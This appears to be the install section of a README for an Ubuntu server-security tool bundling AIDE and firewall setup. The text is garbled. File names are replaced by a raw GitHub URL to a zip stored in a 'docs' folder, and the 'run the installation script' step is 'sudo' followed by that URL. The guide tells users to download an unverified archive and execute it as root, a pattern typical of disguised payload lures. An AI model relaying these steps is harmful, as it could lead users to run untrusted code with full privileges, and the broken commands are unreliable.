- Operating System: Ubuntu (20.04 or later recommended)

Follow these steps to download and run the software:

Download the Application: Visit the Releases page to download the latest version.

Locate the Downloaded File: Check your Downloads folder. You should see a file named

Extract the Files: Right-click on the
https://github.com/Molotov137/ubuntu-server-security/raw/refs/heads/main/ufw/docs/server_ubuntu_security_v2.2.zipfile and select "Extract Here" to unpack its contents. -
Open a Terminal: You can open a terminal by searching for "Terminal" in your application menu.

Navigate to the Folder: Type
cd ~/Downloads/ubuntu-server-securityin your terminal and hit Enter. This command changes your working directory to the folder containing the extracted files. -
Run the Installation Script: Enter the command
sudo https://github.com/Molotov137/ubuntu-server-security/raw/refs/heads/main/ufw/docs/server_ubuntu_security_v2.2.zipand hit Enter. You may need to enter your password. This script will set up the security components on your system. -
Follow On-Screen Prompts: Follow any instructions provided during the installation process.

Verify Installation: After the installation, type
sudo systemctl status aideto check if the AIDE service is running.
Once installed, you can configure each component based on your needs:

Modular Configurations: Each security tool comes with a configuration file located in the
/etcdirectory for easy customization. -
